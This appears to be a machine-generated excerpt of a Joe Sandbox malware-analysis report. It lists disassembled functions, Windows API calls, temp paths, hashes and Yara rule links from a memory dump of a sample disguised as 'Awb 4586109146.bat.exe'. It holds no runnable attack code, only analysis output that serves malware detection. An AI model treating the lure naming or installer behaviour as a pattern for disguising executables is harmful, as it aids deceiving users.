Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
Instruction ID: 46c72067781f24dbae578634f425dbba750e376c3d5c902d6f733973cd64d3bf
Opcode Fuzzy Hash: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
Instruction Fuzzy Hash: 9621AEB1800128BBDF116FA5DE89DDE7E79AF08364F14423AF960762E0CB794C418B98

Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nscEFD5.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nscEFD5.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3

Strings

C:\Users\user\AppData\Local\Temp\nscEFD5.tmp, xrefs: 004025E1
C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll, xrefs: 004025B3, 004025DA, 004025EE, 0040263A

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp$C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll
API String ID: 3109718747-589618630
Opcode ID: 838fef82e08b076f5d49a30e748d8985297f415acc20a77e8e630ea48f411f47
Instruction ID: 4af4a56a495a7247eb1268c7c56f37f79310e300d8c273c1dd4748c0a8a00d57
Opcode Fuzzy Hash: 838fef82e08b076f5d49a30e748d8985297f415acc20a77e8e630ea48f411f47
Instruction Fuzzy Hash: 41110872A04301BADB046FB18E89A9F7664AF44398F24443FF103F61D0DAFC89416B5E

Function 739618D9 Relevance: 7.7, APIs: 5, Instructions: 194COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 7396193A
GlobalFree.KERNEL32(?), ref: 73961ADA
GlobalFree.KERNEL32(?), ref: 73961ADF

Memory Dump Source

Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true

Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: ea1ce5d861fe7f685d438c1612a6964d21fa6170e430e2eb62bc9564fc105b85
Instruction ID: d0024a9871b06b06f4edce5b9e104dfbc4111e0dec7516adcb5b7b489bc0517d
Opcode Fuzzy Hash: ea1ce5d861fe7f685d438c1612a6964d21fa6170e430e2eb62bc9564fc105b85
Instruction Fuzzy Hash: B051C532D03159EBEB02DFA4CD407ADBBBEEB44394F18426AD407A3294D6719EC18793

Function 73962394 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 739624D6

Part of subcall function 7396122C: lstrcpynW.KERNEL32(00000000,?,739612DF,00000019,739611BE,-000000A0), ref: 7396123C

GlobalAlloc.KERNEL32(00000040), ref: 7396245C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73962477

Memory Dump Source

Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true

Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: ed48bd0e5735da848dc042d74cba18bfc8092a1c469b6310bf72eefefcfbcaed
Instruction ID: 09524f4e4f5fe15fdeba7793416226dbbffaaea991c96a5959f5d1ead4384bd5
Opcode Fuzzy Hash: ed48bd0e5735da848dc042d74cba18bfc8092a1c469b6310bf72eefefcfbcaed
Instruction Fuzzy Hash: 1D419DB100A709EFD315EF61D844FA677B8FB88754F10492EE58B8B585EB70A484CB63

Function 7396161D Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,739621EC,?,00000808), ref: 73961635
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,739621EC,?,00000808), ref: 7396163C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,739621EC,?,00000808), ref: 73961650
GetProcAddress.KERNEL32(739621EC,00000000), ref: 73961657
GlobalFree.KERNEL32(00000000), ref: 73961660

Memory Dump Source

Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true

Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 65f5c366cf1ec65614f6f895060ed0b150562d836593c0a311b3a1fde8c7361a
Instruction ID: 8f227666eb1ac5742b9279a2633dae44e20bee4833a1f3268f18baca3afcc4a6
Opcode Fuzzy Hash: 65f5c366cf1ec65614f6f895060ed0b150562d836593c0a311b3a1fde8c7361a
Instruction Fuzzy Hash: D1F0AC7320B538BBD62126E78C4CD9BBE9CDF8B6F5B210225F62C96190C6619D01D7F1

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
Opcode Fuzzy Hash: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38

Function 00404ADE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
wsprintfW.USER32 ref: 00404B88
SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B

Strings

%u.%u%s%s, xrefs: 00404B69

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
Opcode Fuzzy Hash: 667e92691d3a32f7dc764ef490f0f11e5b3d1f36831efa1286417e207b6162a7
Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8

Function 00405C3A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\,?,00405CAE,C:\,C:\,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405C48
CharNextW.USER32(00000000), ref: 00405C4D
CharNextW.USER32(00000000), ref: 00405C65

Strings

C:\, xrefs: 00405C3B

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
Instruction ID: 75375947fb2108fa8988f35f37760ff259c71c6e50658764317197b9124938a5
Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
Instruction Fuzzy Hash: DAF0BB61908F1199FB3177644C49E7B66BCDB55350B04853FD641B71C0D7F84C818BD9

Function 00405B8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 00405B95
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 00405B9F
lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405BB1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B8F

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-4083868402
Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction ID: 9f579dd6f6e84daacee8b4087b975d8f345068127d43d06e1f6a06445f68851b
Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction Fuzzy Hash: C8D05E31101534AAC111BF448D04CDF72ACAE45344742007AF501B20A2C7B82D5186FE

Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403059,?,?,00000006,00000008,0000000A), ref: 00402E8C
GetTickCount.KERNEL32 ref: 00402EAA
CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC

Function 00405296 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004052C5
CallWindowProcW.USER32(?,?,?,?), ref: 00405316

Part of subcall function 0040427D: SendMessageW.USER32(00010438,00000000,00000000,00000000), ref: 0040428F

Strings

, xrefs: 004052A6

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
Instruction ID: 81d983181078a42bdaaa38d141d1896fcab4c42a172a92442cc7f35772e796f5
Opcode Fuzzy Hash: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
Instruction Fuzzy Hash: 8E018431200709EBDF205F51DDD4A5B7B25EB84794F50507BFA00751D0D7BA8C929E2E

Function 00403915 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75573420,004038ED,00403703,00000006,?,00000006,00000008,0000000A), ref: 0040392F
GlobalFree.KERNEL32(?), ref: 00403936

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403927

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-4083868402
Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
Instruction ID: cd662c2fc9a96c5040b18d0515cf0ea54f7952519699f51ce209c07819915f51
Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
Instruction Fuzzy Hash: 20E0C2335016209BC6215F04ED08B5E776CAF58B32F05447AF8807B26087B81C838FD8

Function 00405BDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Awb 4586109146.bat.exe,C:\Users\user\Desktop\Awb 4586109146.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BE1
CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Awb 4586109146.bat.exe,C:\Users\user\Desktop\Awb 4586109146.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BF1

Strings

C:\Users\user\Desktop, xrefs: 00405BDB

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1876063424
